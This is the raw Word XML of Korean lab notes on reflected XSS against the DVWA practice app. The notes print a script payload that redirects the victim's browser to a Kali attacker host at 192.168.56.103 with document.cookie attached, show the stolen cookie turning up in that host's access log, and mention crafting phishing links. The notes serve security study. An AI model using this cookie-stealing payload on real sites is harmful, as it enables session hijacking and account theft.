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Low /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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어떤 웹 애플리케이션이 사용자가 입력한 값을 그대로 출력하는 경우,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스크립트를 입력할 수 있고, 입력된 스크립트가 응답되어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51CFDE8" w:rsidR="002875BD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3445737D" wp14:editId="139B55D9">
            <wp:extent cx="4131733" cy="600337"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="148638759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596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65" cy="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D54" w14:textId="003077E4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위의 세션 쿠키를 공격자(kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)로 전달하기 위해 웹 서버 시작</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8914A" w14:textId="77777777" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="000C5481">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29745F45" w14:textId="11E503C8" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="00C37311">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37311">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19CED857" wp14:editId="1C3FDDF2">
            <wp:extent cx="4758267" cy="5011957"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="142909545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45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0" cy="5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AA6" w14:textId="77777777" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="00C3731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칼리 리눅스의 현재 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 주소는 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4AB7A" w14:textId="0C1C3AC5" w:rsidR="00C37311" w:rsidRDefault="00C3731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서버가 제대로 시작되었다면 웹 브라우저로 접속했을 때, 위와 같은 화면 표시됨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D1825" w14:textId="5D1435B5" w:rsidR="00C37311" w:rsidRDefault="00C3731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C1AB13" w14:textId="17A299FA" w:rsidR="00EE5EFB" w:rsidRDefault="00EE5EFB" w:rsidP="00EE5EFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5EFB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F9D3C0" wp14:editId="66E89C18">
            <wp:extent cx="5588431" cy="766233"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1154715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9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945" cy="7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CDC" w14:textId="5184218D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실습 중 로그 파일 모니터링을 위한 명령어</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B39C0DE" w14:textId="32807D84" w:rsidR="00EE5EFB" w:rsidRDefault="00EE5EFB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access.log 파일은 접근 로그를 기록하는 파일 -&gt; 웹 서버로 들어온 요청 정보 기록</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381F1F92" w14:textId="77777777" w:rsidR="00102E31" w:rsidRDefault="00102E31" w:rsidP="00EE5EFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AFAD0C" w14:textId="368E9767" w:rsidR="00102E31" w:rsidRDefault="00102E31" w:rsidP="00102E3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DVWA 실습 페이지 입력란에 아래와 같은 스크립트 입력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102E31" w14:paraId="127E70D6" w14:textId="77777777" w:rsidTr="00102E31">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="483E20D5" w14:textId="6E0EBC6A" w:rsidR="00102E31" w:rsidRPr="00102E31" w:rsidRDefault="00102E31" w:rsidP="00EE5E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&lt;script&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>document.location</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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http://192.168.56.103/cookie?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+document.cookie&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72787805" w14:textId="7B62C243" w:rsidR="00102E31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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용하여 지정한 위치로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</w:p>
    <w:p w14:paraId="6786C5CF" w14:textId="640E0A2B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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>실행시</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, 웹 브라우저는 공격자의 호스트로 접속</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E489B18" w14:textId="77777777" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="00EE5EFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E85C806" w14:textId="0C7AB013" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="008123FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440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59C17290" wp14:editId="603A17B2">
            <wp:extent cx="5020733" cy="717179"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="758531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193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518" cy="7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E17" w14:textId="77777777" w:rsidR="00FB70E3" w:rsidRDefault="00FB70E3" w:rsidP="00EE5EF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요청 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>전송시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후 에러 발생 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AD7969" w14:textId="053539D3" w:rsidR="00FB70E3" w:rsidRDefault="00FB70E3" w:rsidP="00FB70E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="4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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리다이렉트</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 된 cookie라는 URL이 공격자의 호스트에 존재하지 않기 때문 -&gt; 상관 X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C155A9F" w14:textId="1700C03A" w:rsidR="00FB70E3" w:rsidRDefault="008123FE" w:rsidP="008123FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220" w:firstLine="198"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008123FE">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44BEA567" wp14:editId="139FEDBC">
            <wp:extent cx="5490634" cy="1046085"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="631771521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1521" name="그림 1" descr="텍스트, 스크린샷, 폰트, 정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541" cy="10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01B" w14:textId="77777777" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="008123FE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실습에서는 접근 로그가 중요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409FACEA" w14:textId="77777777" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="008123FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="44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>-&gt; 모니터링하고 있던 접근 로그를 살펴보면 새로운 내용 기록된 것을 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A287B58" w14:textId="1DB8C051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새로운 로그 중 GET /cookie? 문자열 이후 나오는 내용이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 의해 출력된 쿠키 정보</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BEF6F6" w14:textId="47B2DFEC" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="00FB70E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220" w:firstLine="19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 w:rsidR="00B93B81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리플렉티드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B93B81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 크로스 사이트 스크립트는 위와 같이 직접 입력보다는 피싱을 통해 정보 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60605A00" w14:textId="462D6651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취약점이 있는 링크를 클릭하게 만드는 것</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D25963" w14:textId="232DCC3E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Burp Suite의 Proxy 히스토리를 이용해 링크를 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD2A42C" w14:textId="4EBFBE5F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-&gt; 이 요청 메시지를 이용하여 피싱에 사용할 링크 만들 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFBFAE3" w14:textId="0A458C76" w:rsidR="00B93B81" w:rsidRDefault="00B93B81" w:rsidP="00B93B81">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220" w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B1B01A" w14:textId="5B4E17C4" w:rsidR="00B93B81" w:rsidRPr="00B93B81" w:rsidRDefault="00210C49" w:rsidP="00B93B81">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLineChars="20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D03A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B93B81" w:rsidRPr="00B93B81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02E31"/>
    <w:rsid w:val="00152476"/>
    <w:rsid w:val="00182C61"/>
    <w:rsid w:val="001C2921"/>
    <w:rsid w:val="00210C49"/>
    <w:rsid w:val="00213827"/>
    <w:rsid w:val="002875BD"/>
    <w:rsid w:val="002A404B"/>
    <w:rsid w:val="002B4141"/>
    <w:rsid w:val="005079E7"/>
    <w:rsid w:val="0063084A"/>
    <w:rsid w:val="00672D66"/>
    <w:rsid w:val="008123FE"/>
    <w:rsid w:val="00906155"/>
    <w:rsid w:val="00911FCE"/>
    <w:rsid w:val="009D0A83"/>
    <w:rsid w:val="009E7E5E"/>
    <w:rsid w:val="00AD03A1"/>
    <w:rsid w:val="00B76007"/>
    <w:rsid w:val="00B93B81"/>
    <w:rsid w:val="00BE3C83"/>
    <w:rsid w:val="00C1370D"/>
    <w:rsid w:val="00C37311"/>
    <w:rsid w:val="00E726BB"/>
    <w:rsid w:val="00EE5EFB"/>
    <w:rsid w:val="00FA069C"/>
    <w:rsid w:val="00FB70E3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23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-18T14:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-24T14:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>